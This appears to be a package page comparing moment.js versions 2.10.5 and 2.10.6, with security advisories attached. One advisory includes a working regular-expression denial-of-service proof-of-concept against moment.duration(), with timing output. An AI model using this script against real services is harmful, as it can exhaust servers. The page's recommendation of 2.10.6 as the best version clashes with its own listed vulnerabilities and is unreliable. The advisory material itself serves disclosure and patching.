Moment.js saw a minor version bump from 2.10.5 to 2.10.6, both iterations focused on providing developers with tools to parse, validate, manipulate, and display dates effectively in JavaScript. Examining the metadata, the core description and infrastructural elements remain consistent, aiming to offer reliable date management. The key difference developers should note is the releaseDate. Version 2.10.6 was released on July 28, 2015, while version 2.10.5 was released on July 26, 2015. This two-day gap suggests that v2.10.6 likely contains bug fixes or very minor enhancements addressing issues discovered quickly after the v2.10.5 release.
For developers deciding which version to use, opting for the newer 2.10.6 is generally advisable as it should incorporate the latest stability improvements. Both versions rely on an identical suite of development dependencies, including tools for testing, linting, code coverage (nyc, karma, qunit, coveralls, grunt-jscs, grunt-contrib-jshint), and build processes (grunt, uglify-js, esperanto). This confirms that the development workflow and standards remained consistent between these versions. Given the minor nature of the update, developers already using 2.10.5 are encouraged to upgrade to 2.10.6 for the best experience.
All the vulnerabilities related to the version 2.10.6 of the package
Regular Expression Denial of Service in moment
Versions of moment prior to 2.11.2 are affected by a regular expression denial of service vulnerability. The vulnerability is triggered when arbitrary user input is passed into moment.duration().
var moment = require('moment');
var genstr = function (len, chr) {
var result = "";
for (i=0; i<=len; i++) {
result = result + chr;
}
return result;
}
for (i=20000;i<=10000000;i=i+10000) {
console.log("COUNT: " + i);
var str = '-' + genstr(i, '1')
console.log("LENGTH: " + str.length);
var start = process.hrtime();
moment.duration(str)
var end = process.hrtime(start);
console.log(end);
}
$ node moment.js
COUNT: 20000
LENGTH: 20002
[ 0, 618931029 ]
COUNT: 30001
LENGTH: 30003
[ 1, 401413894 ]
COUNT: 40002
LENGTH: 40004
[ 2, 437075303 ]
COUNT: 50003
LENGTH: 50005
[ 3, 824664804 ]
COUNT: 60004
LENGTH: 60006
[ 5, 651335262 ]
Please update to version 2.11.2 or later.
Regular Expression Denial of Service in moment
Affected versions of moment are vulnerable to a low severity regular expression denial of service when parsing dates as strings.
Update to version 2.19.3 or later.
Path Traversal: 'dir/../../filename' in moment.locale
This vulnerability impacts npm (server) users of moment.js, especially if user provided locale string, eg fr is directly used to switch moment locale.
This problem is patched in 2.29.2, and the patch can be applied to all affected versions (from 1.0.1 up until 2.29.1, inclusive).
Sanitize user-provided locale name before passing it to moment.js.
Are there any links users can visit to find out more?
If you have any questions or comments about this advisory: